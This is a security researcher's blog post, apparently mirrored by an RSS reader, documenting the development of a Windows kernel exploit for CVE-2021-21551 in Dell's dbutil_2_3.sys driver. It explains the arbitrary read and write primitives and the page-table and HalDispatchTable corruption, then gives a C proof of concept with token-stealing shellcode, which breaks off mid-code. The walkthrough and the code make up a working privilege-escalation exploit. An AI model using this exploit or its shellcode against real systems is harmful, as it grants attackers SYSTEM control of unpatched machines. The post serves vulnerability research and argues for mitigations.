RSS Security

🔒
❌ About FreshRSS
There are new articles available, click to refresh the page.
Before yesterdayConnor McGarr

Exploit Development: CVE-2021-21551 - Dell ‘dbutil_2_3.sys’ Kernel Exploit Writeup

16 May 2021 at 00:00

Introduction

Recently I said I was going to focus on browser exploitation with Advanced Windows Exploitation being canceled. With this cancellation, I found myself craving a binary exploitation training, with AWE now being canceled for the previous two years. I found myself enrolled in HackSysTeam’s Windows Kernel Exploitation Advanced course, which will be taking place at the end of this month at CanSecWest, due to the cancellation. I have already delved into the basics of kernel exploitation, and I had been looking to complete a few exercises to prepare for the end of the month, and shake the rust off.

I stumbled across this SentinelOne blog post the other day, which outlined a few vulnerabilities in Dell’s dbutil_2_3.sys driver, including a memory corruption vulnerability. Although this vulnerability was attributed to Kasif Dekel, it apparently was discovered earlier by Yarden Shafir and Staoshi Tanda, coworkers of mine at CrowdStrike.

After reading Kasif’s blog post, which practically outlines the entire vulnerability and does an awesome job of explaining things and giving researchers a wonderful starting point, I decided that I would use this opportunity to get ready for Windows Kernel Exploitation Advanced at the end of the month.

I also decided, because Kasif leverages a data-only attack, instead of something like corrupting page table entries, that I would try to recreate this exploit by achieving a full SYSTEM shell via page table corruption. The final result ended up being an weaponed exploit. I wanted to take this blog post to showcase just a few of the “checks” that needed to be bypassed in the kernel in order to reach the final arbitrary read/write primitive, as well as why modern mitigations such as Virtualization-Based Security (VBS) and Hypervisor-Protected Code Integrity (HVCI) are so important in today’s threat landscape.

In addition, three of my favorite things to do are to write, conduct vulnerability research, and write code - so regardless of if you find this blog helpful/redundant, I just love to write blogs at the end of the day :-). I also hope this blog outlines, as I mentioned earlier, why it is important mitigations like VBS/HVCI become more mainstream and that at the end of the day, these two mitigations in tandem could have prevented this specific method of exploitation (note that other methods are still viable, such as a data-only attack as Kasif points out).

Arbitrary Write Primitive

I will not attempt to reinvent the wheel here, as Kasif’s blog post explains very well how this vulnerability arises, but the tl;dr on the vulnerability is there is an IOCTL code that any client can trigger with a call to DeviceIoControl that eventually reaches a memmove routine, in which the user-supplied buffer from the vulnerable IOCTL routine is used in this call.

Let’s get started with the analysis. As is accustom in kernel exploits, we first need a way, generally speaking, to interact with the driver. As such, the first step is to obtain a handle to the driver. Why is this? The driver is an object in kernel mode, and as we are in user mode, we need some intermediary way to interact with the driver. In order to do this, we need to look at how the DEVICE_OBJECT is created. A DEVICE_OBJECT generally has a symbolic link which references it, that allows clients to interact with the driver. This object is what clients interact with. We can use IDA in our case to locate the name of the symbolic link. The DriverEntry function is like a main() function in a kernel mode driver. Additionally, DriverEntry functions are prototyped to accept a pointer to a DRIVER_OBJECT, which is essentially a “representation” of a driver, and a RegistryPath. Looking at Microsoft documentation of a DRIVER_OBJECT, we can see one of the members of this structure is a pointer to a DEVICE_OBJECT.

Loading the driver in IDA, in the Functions window under Function name, you will see a function called DriverEntry.

This entry point function, as we can see, performs a jump to another function, sub_11008. Let’s examine this function in IDA.

As we can see, the \Device\DBUtil_2_3 string is used in the call to IoCreateDevice to create a DEVICE_OBJECT. For our purposes, the target symbolic link, since we are a user-mode client, will be \\\\.\\DBUtil_2_3.

Now that we know what the target symbolic link is, we then need to leverage CreateFile to obtain a handle to this driver.

We will start piecing the code together shortly, but this is how we obtain a handle to interact with the driver.

The next function we need to call is DeviceIoControl. This function will allow us to pass the handle to the driver as an argument, and allow us to send data to the driver. However, we know that drivers create I/O Control (IOCTL) routines that, based on client input, perform different actions. In this case, this driver exposes many IOCTL routines. One way to determine if a function in IDA contains IOCTL routines, although it isn’t fool proof, is looking for many branches of code with cmp eax, DWORD. IOCTL codes are DWORDs and drivers, especially enterprise grade drivers, will perform many different actions based on the IOCTL specified by the client. Since this driver doesn’t contain many functions, it is relatively trivial to locate a function which performs many of these validations.

Per Kasif’s research, the vulnerable IOCTL in this case is 0x9B0C1EC8. In this function, sub_11170, we can look for a cmp eax, 9B0C1EC8h instruction, which would be indicative that if the vulnerable IOCTL code is specified, whatever code branches out from that compare statement would lead us to the vulnerable code path.

This compare, if successful, jumps to an xor edx, edx instruction.

After the XOR instruction incurs, program execution hits the loc_113A2 routine, which performs a call to the function sub_15294.

If you recall from Kasif’s blog post, this is the function in which the vulnerable code resides in. We can see this in the function, by the call to memmove.

What primitive do we have here? As Kasif points out, we “can control the arguments to memmove” in this function. We know that we can hit this function, sub_15294, which contains the call to memmove. Let’s take a look at the prototype for memmove, as seen here.

As seen above, memmove allows you to move a pointer to a block of memory into another pointer to a block of memory. If we can control the arguments to memmove, this gives us a vanilla arbitrary write primitive. We will be able to overwrite any pointer in kernel mode with our own user-supplied buffer! This is great - but the question remains, we see there are tons of code branches in this driver. We need to make sure that from the time our IOCTL code is checked and we are directed towards our code path, that any compare statements/etc. that arise are successfully dealt with, so we can reach the final memmove routine. Let’s begin by sending an arbitrary QWORD to kernel mode.

After loading the driver on the debuggee machine, we can start a kernel-mode debugging session in WinDbg. After verifying the driver is loaded, we can use IDA to locate the offset to this function and then set a breakpoint on it.

Next, after running the POC on the debuggee machine, we can see execution hits the breakpoint successfully and the target instruction is currently in RIP and our target IOCTL is in the lower 32-bits of RAX, EAX.

After executing the cmp statement and the jump, we can see now that we have landed on the XOR instruction, per our static analysis with IDA earlier.

Then, execution hits the call to the function (sub+15294) which contains the memmove routine - so far so good!

We can see now we have landed inside of the function call, and a new stack frame is being created.

If we look in the RCX register currently, we can see our buffer, when dereferencing the value in RCX.

We then can see that, after stepping through the sup rsp, 0x40 stack allocation and the mov rbx, rcx instruction, the value 0x8 is going to be placed into ECX and used for the cmp ecx, 0x18 instruction.

What is this number? This is actually the size of our buffer, which is currently one QWORD. Obviously this compare statement will fail, and essentially an NTSTATUS code is returned back to the client of 0xC0000000D, which means STATUS_INVALID_PARAMETER. This is the driver’s way to let the client know one of the needed arguments wasn’t correct in the IOCTL call. This means that if we want to reach the memmove routine, we will at least need to send 0x18 bytes worth of data.

Refactoring our code, let’s try to send a contiguous buffer of 0x18 bytes of data.

After hitting the sub_5294 function, we see that this time the cmp ecx, 0x18 check will be bypassed.

After stepping through a few instructions, after the test rax, rax bitwise test and the jump instruction, we land on a load effective address instruction, and we can see our call to memmove, although there is no symbol in WinDbg.

Since we are about to hit the call to memmove, we know that the __fastcall calling convention is in use, as we see no movements to the stack and we are on a 64-bit system. Because of this, we know that, based on the prototype, the first argument will be placed into RCX, which will be the destination buffer (e.g. where the memory will be written to). We also know that RDX will contain the source buffer (e.g. where the memory comes from).

Stepping into the mov ecx, dword ptr[rsp+0x30], which will move the lower 32-bits of RSP, ESP, into ECX, we can see that a value of 0x00000000 is about to be moved into ECX.

We then see that the value on the stack, at an offset of 0x28, is added to the value in RCX, which is currently zero.

We then can see that invalid memory will be dereferenced in the call to memmove.

Why is this? Recall the prototype of memmove. This function accepts a pointer to memory. Since we passed raw values of junk, these addresses are invalid. Because of this, let’s switch up our POC a bit again in order to see if we can’t get a desired result. Let’s use KUSER_SHARD_DATA at an offset of 0x800, which is 0xFFFFF78000000800, as a proof of concept.

This time, per Kasif’s research, we will send a 0x20 byte buffer. Kasif points out that the memmove routine, before reaching the call, will select at an offset of 0x8 (the destination) and 0x18 (the source).

After re-executing the POC, let’s jump back right before the call to memmove.

We can see that this time, 0x42 bytes, 4 bytes of them to be exact, will be loaded into ECX.

Then, we can clearly see that the value at the stack, plus 0x28 bytes, will be added to ECX. The final result is 0xFFFFF78042424242.

We then can see that before the call, another part of our buffer is moved into RDX as the source buffer. This allows us an arbitrary write primitive! A buffer we control will overwrite the pointer at the memory address we supply.

The issue is, however, with the source address. We were attempting to target 0xFFFFF78000000800. However, our address got mangled into 0xFFFFF78042424242. This is because it seems like the lower 32-bits of one of our user-supplied QWORDS first gets added to the destination buffer. This time, if we resend the exploit and we change where 0x4242424242424242 once was with 0x0000000000000000, we can “bypass” this issue, but having a value of 0 added, meaning our target address will remain unmangled.

After sending the POC again, we can see that the correct target address is loaded into RCX.

Then, as expected, our arguments are supplied properly to the call to memmove.

After stepping over the function call, we can see that our arbitrary write primitive has successfully worked!

Again, thank you to Kasif for his research on this! Now, let’s talk about the arbitrary read primitive, which is very similar!

Arbitrary Read Primitive

As we know, whenever we supply arguments to the vulnerable memmove routine used for an arbitrary write primitive, we can supply the “what” (our data) and the “where” (where do we write the data). However, recall the image two images above, showcasing our successful arguments, that since memmove accepts two pointers, the argument in RDX, which is a pointer to 0x4343434343434343, is a kernel mode address. This means, at some point between the memmove call and our invocation of DeviceIoControl, our array of QWORDS was transferred to kernel mode, so it could be used by the driver in the call to memmove. Notice, however, that the target address, the value in RCX, is completely controllable by us - meaning the driver doesn’t create a pointer to that QWORD, we can directly supply it. And, since memmove will interpret that as a pointer, we can actually overwrite whatever we pass to the target buffer, which in this case is any address we want to corrupt.

What if, however, there was a way to do this in reverse? What if, in place of the kernel mode address that points to 0x4343434343434343 we could just supply our own memory address, instead of the driver creating a pointer to it, identically to how we control the target address we want to move memory to.

This means, instead of having something like this for the target address:

ffffc605`24e82998	43434343`43434343

What if we could just pass our own data as such:

43434343`43434343	DATA

Where 0x4343434343434343 is a value we supply, instead of having the kernel create a pointer to it for us. That way, when memmove interprets this address, it will interpret it as a pointer. This means that if we supply a memory address, whatever that memory address points to (e.g. nt!MiGetPteAddress+0x13 when dereferenced) is copied to the target buffer!

This could go one of two ways potentially: option one would be that we could copy this data into our own pointer in C. However, since we see that none of our user-mode addresses are making it to the driver, and the driver is taking our buffer and placing it in kernel mode before leveraging it, the better option, perhaps, would be to supply an output buffer to DeviceIoControl and see if the memmmove data writes it to the output buffer.

The latter option makes sense as this IOCTL allows any client to supply a buffer and have it copied. This driver most likely isn’t expecting unauthorized clients to this IOCTL, meaning the input and output buffers are most likely being used by other kernel mode components/legitimate user-mode clients that need an easy way to pass and receive data. Because of this, it is more than likely it is expected behavior for the output buffer to contain memmove data. The problem is we need to find another memmove routine that allows us to essentially to the inverse of what we did with the arbitrary write primitive.

Talking to a peer of mine, VoidSec about my thought process, he pointed me towards Metasploit, which already has this concept outlined in their POC.

Doing a bit more of reverse engineering, we can see that there is more than one way to reach the arbitrary write memmove routine.

Looking into the sub_15294, we can see that this is the same memmove routine leveraged before.

However, since there is another IOCTL routine that invokes this memmove routine, this is a prime candidate to see if anything about this routine is different (e.g. why create another routine to do the same thing twice? Perhaps this routine is used for something else, like reading memory or copying memory in a different way). Additionally, recall when we performed an arbitrary write, the routines were indexing our buffer at 0x8 and 0x18. This could mean that the call to memmove, via the new IOCTL, could setup our buffer in a way that the buffer is indexed at a different offset, meaning we may be able to achieve an arbitrary read.

It is possible to reach this routine through the IOCTL 0x9B0C1EC4.

Let’s update our POC to attempt to trigger the new IOCTL and see if anything is returned in the output buffer. Essentially, we will set the second value, similar to last time, of our QWORD array to the value we want to interact with, in this case, read, and set everything else to 0. Then, we will reuse the same array of QWORDS as an output buffer and see if anything was written to the buffer.

We can use IDA to identify the proper offset within the driver that the cmp eax, 0x9B0C1EC4 lands on, which is sub_11170+75.

We know that the first IOCTL code we will hit is the arbitrary write IOCTL, so we can pass over the first compare and then hit the second.

We then can see execution reaches the function housing the memmove routine, sub_15294.

After stepping through a few instruction, we can see our input buffer for the read primitive is being propagated and setup for the future call to memmove.

Then, the first part of the buffer is moved into RAX.

Then, the target address we would like to dereference and read from is loaded into RAX.

Then, the target address of KUSER_SHARED_DATA is loaded into RCX and then, as we can see, it will be loaded into RDX. This is great for us, as it means the 2nd argument for a function call on 64-bit systems on Windows is loaded into RDX. Since memmove accepts a pointer to a memory address, this means that this address will be the address that is dereferenced and then has its memory copied into a target buffer (which hopefully is returned in the output buffer parameter of DeviceIoControl).

Recall in our arbitrary write routine that the second parameter, 4343434343434343 was pointed to by a kernel mode address. Look at the above image and see now that we control the address (0xFFFFF78000000000), but this time this address will be dereferenced and whatever this address points to will be written to the buffer pointed to by RCX. Since in our last routine we controlled both arguments to memmove, we can expect that, although the value in RCX is in kernel mode, it will be bubbled back up into user mode and will be placed in our output buffer! We can see just before the return from memmove, the return value is the buffer in which the data was copied into, and we can see the buffer contains 0x0fa0000000000000! Looking in the debugger, this is the value KUSER_SHARED_DATA points to.

We really don’t need to do any more debugging/reverse engineering as we know that we completely control these arguments, based on our write primitive. Pressing g in the debugger, we can see that in our POC console, we have successfully performed an arbitrary read!

We indexed each array element of the QWORD array we sent, per our code, and we can see the last element will contain the dereferenced contents of the value we would like to read from! Now that we have a vanilla 1 QWORD arbitrary read/write primitive, we can now get into out exploitation path.

Why Perform a Data-Only Attack When You Can Corrupt All Of The Memory and Deal With All of the Mitigations? Let’s Have Some Fun And Make Life Artificially Harder On Ourselves!

First, please note I have more in-depth posts on leveraging page table entries and memory paging for kernel exploitation found here and here.

Our goal with this exploitation path will be the following:

  1. Write our shellcode somewhere that is writable in the driver’s virtual address space
  2. Locate the base of the page table entries
  3. Calculate where the page table entry for the memory page where our shellcode lives
  4. Corrupt the page table entry to make the shellcode page RWX, circumventing SMEP and bypassing kernel no-eXecute (DEP)
  5. Overwrite nt!HalDispatchTable+0x8 and circumvent kCFG (kernel Control-Flow Guard) (Note that if kCFG was fully enabled, then VBS/HVCI would then be enabled - rendering this technique useless. kCFG does still have some functionality, even when VBS/HVCI is disabled, like performing bitwise tests to ensure user mode addresses aren’t called from kernel mode. This simply just “circumvents” kCFG by calling a pointer to our shellcode, which exists in kernel mode from the first step).

First we need to find a place in kernel mode that we can write our shellcode to. KUSER_SHARED_DATA is a perfectly fine solution, but there is also a good candidate within the driver itself, located in its .data section, which is already writable.

We can see that from the above image, we have a ton of room to work with, in terms of kernel mode writable memory. Our shellcode is approximately 9 QWORDS, so we will have more than enough room to place our shellcode here.

We will start our shellcode out at .data+0x10. Since we know where the shellcode will go, and since we know it resides in the dbutil_2_3.sys driver, we need to add a routine to our exploit that can retrieve the load address of the kernel, for PTE indexing calculations, and the base address of the driver.

Note that this assumes the process invoking this exploit is that of medium integrity.

The next step, since we know where we want to write to is at an offset of 0x3000 (offset to .data.) + 0x10 (offset to code cave) from the base address of dbutil_2_3.sys, is to locate the page table entry for this memory address, which already is a kernel-mode page and is writable (you could use KUSER_SHARED_DATA+0x800). In order to perform the calculations to locate the page table entry, we first need to bypass page table randomization, a mitigation of Windows 10 after 1607.

This is because we need the base of the page table entries in order to locate the PTE for a specific page in memory (the page table entries are an array of virtual addresses in this case). The Windows API function nt!MiGetPteAddress, at an offset of 0x13, contains, dynamically, the base of the page table entries as this kernel mode function is leveraged to find the base of the page table entries.

Let’s use our read primitive to locate the base of the page table entries (note that I used a static offset from the base of the kernel to nt!MiGetPteAddress, mostly because I am focused on the exploitation phase of this CVE, and not making this exploit portable. You’ll need to update this based on your patch level).

Here we can see we obtain the initial handle to the driver, create a buffer based on our read primitive, send it to the driver, and obtain the base of the page table entries. Then, we programmatically can replicate what nt!MiGetPteAddress does in order to fetch the correct page table entry in the array for the page we will be writing our shellcode to.

Now that we have calculated the page table entry for where our shellcode will be written to, let’s now dereference it in order to preserve what the PTE bits contain, in terms of permissions, so we can modify this value later

Checking in WinDbg, we can also see this is the case!

Now that we have the virtual address for our page table entry and we have extracted the current bits that comprise the entry, let’s write our shellcode to .data+0x10 (dbutil_2_3+0x3010).

After execution of the updated POC, we can clearly see that the arbitrary write routines worked, and our shellcode is located in kernel mode!

Perfect! Now that we have our shellcode in kernel mode, we need to make it executable. After all, the .data section of a PE or driver is read/write. We need to make this an executable region of memory. Since we have the PTE bits already stored, we can update our page table entry bits, stored in our exploit, to contain the bits with the no-eXecute bit cleared, and leverage our arbitrary write primitive to corrupt the page table entry and make it read/write/execute (RWX)!

Perfect! Now that we have made our memory region executable, we need to overwrite the pointer to nt!HalDispatchTable+0x8 with this memory address. Then, when we invoke ntdll!NtQueryIntervalProfile from user mode, which will trigger a call to this QWORD! However, before overwriting nt!HalDispatchTable+0x8, let’s first use our read primitive to preserve the current pointer, so we can put it back after executing our shellcode to ensure system stability, as the Hardware Abstraction Layer is very important on Windows and the dispatch table is referenced regularly.

After preserving the pointer located at nt!HalDispatchTable+0x8 we can use our write primitive to overwrite nt!HalDispatchTable+0x8 with a pointer to our shellcode, which resides in kernel mode memory!

Perfect! At this point, if we invoke nt!HalDispatchTable+0x8’s pointer, we will be calling our shellcode! The last step here, besides restoring everything, is to resolve ntdll!NtQueryIntervalProfile, which eventually performs a call to [nt!HalDispatchTable+0x8].

Then, we can finish up our exploit by adding in the restoration routine to restore nt!HalDispatchTable+0x8.

Let’s set a breakpoint on nt!NtQueryIntervalProfile, which will be called, even though the call originates from ntdll.dll.

After hitting the breakpoint, let’s continue to step through the function until we hit the call nt!KeQueryIntervalProfile function call, and let’s use t to step into it.

Stepping through approximately 9 instructions inside of ntKeQueryIntervalProfile, we can see that we are not directly calling [nt!HalDispatchTable+0x8], but we are calling nt!guard_dispatch_icall. This is part of kCFG, or kernel Control-Flow Guard, which validates indirect function calls (e.g. calling a function pointer).

Clearly, as we can see, the value of [nt!HalDispatchTable+0x8] is pointing to our shellcode, meaning that kCFG should block this. However, kCFG actually requires Virtualization-Based Security (VBS) to be fully implemented. We can see though that kCFG has some functionality in kernel mode, even if it isn’t implemented full scale. The routines still exist in the kernel, which would normally check a bitmap of all indirect function calls and determine if the value that is about to be placed into RAX in the above image is a “valid target”, meaning at compile time, when the bitmap was created, did the address exist and is it apart of any valid control-flow transfer.

However, since VBS is not mainstream yet, requires specific hardware, and because this exploit is being developed in a virtual machine, we can disregard the VBS side for now (note that this is why mitigations like VBS/HVCI/HyperGuard/etc. are important, as they do a great job of thwarting these types of memory corruption vulnerabilities).

Stepping through the call to nt!guard_dispatch_icall, we can actually see that all this routine does essentially, since VBS isn’t enabled, is bitwise test the target address in RAX to confirm it isn’t a user-mode address (basically it checks to see if it is sign-extended). If it is a user-mode address, you’ll actually get a bug check and BSOD. This is why I opted to keep our shellcode in kernel mode, so we can pass this bitwise test!

Then, after stepping through everything, we can see now that control-flow transfer has been handed off to our shellcode.

From here, we can see we have successfully obtained NT AUTHORITY\SYSTEM privileges!

“When Napoleon lay at Boulogne for a year with his flat-bottom boats and his Grand Army, he was told by someone ‘There are bitter weeds in VBS/HVCI/kCFG’”

Although this exploit was arduous to create, we can clearly see why data-only attacks, such as the _SEP_TOKEN_PRIVILEGES method outlined by Kasif are optimal. They bypass pretty much any memory corruption related mitigation.

Note that VBS/HVCI actually creates an additional security boundary for us. Page table entries, when VBS is enabled, are actually managed by a higher security boundary, virtual trust level 1 - which is the secure kernel. This means it is not possible to perform PTE manipulation as we did. Additionally, even if this were possible, HVCI is essentially Arbitrary Code Guard (ACG) in the kernel - meaning that it also isn’t possible to manipulate the permissions of memory as we did. These two mitigations would also allow kCFG to be fully implemented, meaning our control-flow transfer would have also failed.

The advisory and patch for this vulnerability can be found here! Please patch your systems or simply remove the driver.

Thank you again to Kasif for this original research! This was certainly a fun exercise :-). Until next time - peace, love, and positivity :-).

Here is the final POC, which can be found on my GitHub:

// CVE-2021-21551: Dell 'dbutil_2_3.sys' Memory Corruption
// Original research: https://labs.sentinelone.com/cve-2021-21551-hundreds-of-millions-of-dell-computers-at-risk-due-to-multiple-bios-driver-privilege-escalation-flaws/
// Author: Connor McGarr (@33y0re)

#include <stdio.h>
#include <Windows.h>
#include <Psapi.h>

// Vulnerable IOCTL
#define IOCTL_WRITE_CODE 0x9B0C1EC8
#define IOCTL_READ_CODE 0x9B0C1EC4

// Prepping call to nt!NtQueryIntervalProfile
typedef NTSTATUS(WINAPI* NtQueryIntervalProfile_t)(IN ULONG ProfileSource, OUT PULONG Interval);

// Obtain the kernel base and driver base
unsigned long long kernelBase(char name[])
{
	// Defining EnumDeviceDrivers() and GetDeviceDriverBaseNameA() parameters
	LPVOID lpImageBase[1024];
	DWORD lpcbNeeded;
	int drivers;
	char lpFileName[1024];
	unsigned long long imageBase;

	BOOL baseofDrivers = EnumDeviceDrivers(
		lpImageBase,
		sizeof(lpImageBase),
		&lpcbNeeded
	);

	// Error handling
	if (!baseofDrivers)
	{
		printf("[-] Error! Unable to invoke EnumDeviceDrivers(). Error: %d\n", GetLastError());
		exit(1);
	}

	// Defining number of drivers for GetDeviceDriverBaseNameA()
	drivers = lpcbNeeded / sizeof(lpImageBase[0]);

	// Parsing loaded drivers
	for (int i = 0; i < drivers; i++)
	{
		GetDeviceDriverBaseNameA(
			lpImageBase[i],
			lpFileName,
			sizeof(lpFileName) / sizeof(char)
		);

		// Keep looping, until found, to find user supplied driver base address
		if (!strcmp(name, lpFileName))
		{
			imageBase = (unsigned long long)lpImageBase[i];

			// Exit loop
			break;
		}
	}

	return imageBase;
}


void exploitWork(void)
{
	// Store the base of the kernel
	unsigned long long baseofKernel = kernelBase("ntoskrnl.exe");

	// Storing the base of the driver
	unsigned long long driverBase = kernelBase("dbutil_2_3.sys");

	// Print updates
	printf("[+] Base address of ntoskrnl.exe: 0x%llx\n", baseofKernel);
	printf("[+] Base address of dbutil_2_3.sys: 0x%llx\n", driverBase);

	// Store nt!MiGetPteAddress+0x13
	unsigned long long ntmigetpteAddress = baseofKernel + 0xbafbb;

	// Obtain a handle to the driver
	HANDLE driverHandle = CreateFileA(
		"\\\\.\\DBUtil_2_3",
		FILE_SHARE_DELETE | FILE_SHARE_READ | FILE_SHARE_WRITE,
		0x0,
		NULL,
		OPEN_EXISTING,
		0x0,
		NULL
	);

	// Error handling
	if (driverHandle == INVALID_HANDLE_VALUE)
	{
		printf("[-] Error! Unable to obtain a handle to the driver. Error: 0x%lx\n", GetLastError());
		exit(-1);
	}
	else
	{
		printf("[+] Successfully obtained a handle to the driver. Handle value: 0x%llx\n", (unsigned long long)driverHandle);

		// Buffer to send to the driver (read primitive)
		unsigned long long inBuf1[4];

		// Values to send
		unsigned long long one1 = 0x4141414141414141;
		unsigned long long two1 = ntmigetpteAddress;
		unsigned long long three1 = 0x0000000000000000;
		unsigned long long four1 = 0x0000000000000000;

		// Assign the values
		inBuf1[0] = one1;
		inBuf1[1] = two1;
		inBuf1[2] = three1;
		inBuf1[3] = four1;

		// Interact with the driver
		DWORD bytesReturned1 = 0;

		BOOL interact = DeviceIoControl(
			driverHandle,
			IOCTL_READ_CODE,
			&inBuf1,
			sizeof(inBuf1),
			&inBuf1,
			sizeof(inBuf1),
			&bytesReturned1,
			NULL
		);

		// Error handling
		if (!interact)
		{
			printf("[-] Error! Unable to interact with the driver. Error: 0x%lx\n", GetLastError());
			exit(-1);
		}
		else
		{
			// Last member of read array should contain base of the PTEs
			unsigned long long pteBase = inBuf1[3];

			printf("[+] Base of the PTEs: 0x%llx\n", pteBase);

			// .data section of dbutil_2_3.sys contains a code cave
			unsigned long long shellcodeLocation = driverBase + 0x3010;

			// Bitwise operations to locate PTE of shellcode page
			unsigned long long shellcodePte = (unsigned long long)shellcodeLocation >> 9;
			shellcodePte = shellcodePte & 0x7FFFFFFFF8;
			shellcodePte = shellcodePte + pteBase;

			// Print update
			printf("[+] PTE of the .data page the shellcode is located at in dbutil_2_3.sys: 0x%llx\n", shellcodePte);

			// Buffer to send to the driver (read primitive)
			unsigned long long inBuf2[4];

			// Values to send
			unsigned long long one2 = 0x4141414141414141;
			unsigned long long two2 = shellcodePte;
			unsigned long long three2 = 0x0000000000000000;
			unsigned long long four2 = 0x0000000000000000;

			inBuf2[0] = one2;
			inBuf2[1] = two2;
			inBuf2[2] = three2;
			inBuf2[3] = four2;

			// Parameter for DeviceIoControl
			DWORD bytesReturned2 = 0;

			BOOL interact1 = DeviceIoControl(
				driverHandle,
				IOCTL_READ_CODE,
				&inBuf2,
				sizeof(inBuf2),
				&inBuf2,
				sizeof(inBuf2),
				&bytesReturned2,
				NULL
			);

			// Error handling
			if (!interact1)
			{
				printf("[-] Error! Unable to interact with the driver. Error: 0x%lx\n", GetLastError());
				exit(-1);
			}
			else
			{
				// Last member of read array should contain PTE bits
				unsigned long long pteBits = inBuf2[3];

				printf("[+] PTE bits for the shellcode page: %p\n", pteBits);

				/*
					; Windows 10 1903 x64 Token Stealing Payload
					; Author Connor McGarr

					[BITS 64]

					_start:
						mov rax, [gs:0x188]		  ; Current thread (_KTHREAD)
						mov rax, [rax + 0xb8]	  ; Current process (_EPROCESS)
						mov rbx, rax			  ; Copy current process (_EPROCESS) to rbx
					__loop:
						mov rbx, [rbx + 0x2f0] 	  ; ActiveProcessLinks
						sub rbx, 0x2f0		   	  ; Go back to current process (_EPROCESS)
						mov rcx, [rbx + 0x2e8] 	  ; UniqueProcessId (PID)
						cmp rcx, 4 				  ; Compare PID to SYSTEM PID
						jnz __loop			      ; Loop until SYSTEM PID is found

						mov rcx, [rbx + 0x360]	  ; SYSTEM token is @ offset _EPROCESS + 0x360
						and cl, 0xf0			  ; Clear out _EX_FAST_REF RefCnt
						mov [rax + 0x360], rcx	  ; Copy SYSTEM token to current process

						xor rax, rax			  ; set NTSTATUS STATUS_SUCCESS
						ret						  ; Done!

				*/

				// One QWORD arbitrary write
				// Shellcode is 67 bytes (67/8 = 9 unsigned long longs)
				unsigned long long shellcode1 = 0x00018825048B4865;
				unsigned long long shellcode2 = 0x000000B8808B4800;
				unsigned long long shellcode3 = 0x02F09B8B48C38948;
				unsigned long long shellcode4 = 0x0002F0EB81480000;
				unsigned long long shellcode5 = 0x000002E88B8B4800;
				unsigned long long shellcode6 = 0x8B48E57504F98348;
				unsigned long long shellcode7 = 0xF0E180000003608B;
				unsigned long long shellcode8 = 0x4800000360888948;
				unsigned long long shellcode9 = 0x0000000000C3C031;

				// Buffers to send to the driver (write primitive)
				unsigned long long inBuf3[4];
				unsigned long long inBuf4[4];
				unsigned long long inBuf5[4];
				unsigned long long inBuf6[4];
				unsigned long long inBuf7[4];
				unsigned long long inBuf8[4];
				unsigned long long inBuf9[4];
				unsigned long long inBuf10[4];
				unsigned long long inBuf11[4];

				// Values to send
				unsigned long long one3 = 0x4141414141414141;
				unsigned long long two3 = shellcodeLocation;
				unsigned long long three3 = 0x0000000000000000;
				unsigned long long four3 = shellcode1;

				unsigned long long one4 = 0x4141414141414141;
				unsigned long long two4 = shellcodeLocation + 0x8;
				unsigned long long three4 = 0x0000000000000000;
				unsigned long long four4 = shellcode2;

				unsigned long long one5 = 0x4141414141414141;
				unsigned long long two5 = shellcodeLocation + 0x10;
				unsigned long long three5 = 0x0000000000000000;
				unsigned long long four5 = shellcode3;

				unsigned long long one6 = 0x4141414141414141;
				unsigned long long two6 = shellcodeLocation + 0x18;
				unsigned long long three6 = 0x0000000000000000;
				unsigned long long four6 = shellcode4;

				unsigned long long one7 = 0x4141414141414141;
				unsigned long long two7 = shellcodeLocation + 0x20;
				unsigned long long three7 = 0x0000000000000000;
				unsigned long long four7 = shellcode5;

				unsigned long long one8 = 0x4141414141414141;
				unsigned long long two8 = shellcodeLocation + 0x28;
				unsigned long long three8 = 0x0000000000000000;
				unsigned long long four8 = shellcode6;

				unsigned long long one9 = 0x4141414141414141;
				unsigned long long two9 = shellcodeLocation + 0x30;
				unsigned long long three9 = 0x0000000000000000;
				unsigned long long four9 = shellcode7;

				unsigned long long one10 = 0x4141414141414141;
				unsigned long long two10 = shellcodeLocation + 0x38;
				unsigned long long three10 = 0x0000000000000000;
				unsigned long long four10 = shellcode8;

				unsigned long long one11 = 0x4141414141414141;
				unsigned long long two11 = shellcodeLocation + 0x40;
				unsigned long long three11 = 0x0000000000000000;
				unsigned long long four11 = shellcode9;

				inBuf3[0] = one3;
				inBuf3[1] = two3;
				inBuf3[2] = three3;
				inBuf3[3] = four3;

				inBuf4[0] = one4;
				inBuf4[1] = two4;
				inBuf4[2] = three4;
				inBuf4[3] = four4;

				inBuf5[0] = one5;
				inBuf5[1] = two5;
				inBuf5[2] = three5;
				inBuf5[3] = four5;

				inBuf6[0] = one6;
				inBuf6[1] = two6;
				inBuf6[2] = three6;
				inBuf6[3] = four6;

				inBuf7[0] = one7;
				inBuf7[1] = two7;
				inBuf7[2] = three7;
				inBuf7[3] = four7;

				inBuf8[0] = one8;
				inBuf8[1] = two8;
				inBuf8[2] = three8;
				inBuf8[3] = four8;

				inBuf9[0] = one9;
				inBuf9[1] = two9;
				inBuf9[2] = three9;
				inBuf9[3] = four9;

				inBuf10[0] = one10;
				inBuf10[1] = two10;
				inBuf10[2] = three10;
				inBuf10[3] = four10;

				inBuf11[0] = one11;
				inBuf11[1] = two11;
				inBuf11[2] = three11;
				inBuf11[3] = four11;

				DWORD bytesReturned3 = 0;
				DWORD bytesReturned4 = 0;
				DWORD bytesReturned5 = 0;
				DWORD bytesReturned6 = 0;
				DWORD bytesReturned7 = 0;
				DWORD bytesReturned8 = 0;
				DWORD bytesReturned9 = 0;
				DWORD bytesReturned10 = 0;
				DWORD bytesReturned11 = 0;

				BOOL interact2 = DeviceIoControl(
					driverHandle,
					IOCTL_WRITE_CODE,
					&inBuf3,
					sizeof(inBuf3),
					&inBuf3,
					sizeof(inBuf3),
					&bytesReturned3,
					NULL
				);

				BOOL interact3 = DeviceIoControl(
					driverHandle,
					IOCTL_WRITE_CODE,
					&inBuf4,
					sizeof(inBuf4),
					&inBuf4,
					sizeof(inBuf4),
					&bytesReturned4,
					NULL
				);

				BOOL interact4 = DeviceIoControl(
					driverHandle,
					IOCTL_WRITE_CODE,
					&inBuf5,
					sizeof(inBuf5),
					&inBuf5,
					sizeof(inBuf5),
					&bytesReturned5,
					NULL
				);

				BOOL interact5 = DeviceIoControl(
					driverHandle,
					IOCTL_WRITE_CODE,
					&inBuf6,
					sizeof(inBuf6),
					&inBuf6,
					sizeof(inBuf6),
					&bytesReturned6,
					NULL
				);

				BOOL interact6 = DeviceIoControl(
					driverHandle,
					IOCTL_WRITE_CODE,
					&inBuf7,
					sizeof(inBuf7),
					&inBuf7,
					sizeof(inBuf7),
					&bytesReturned7,
					NULL
				);

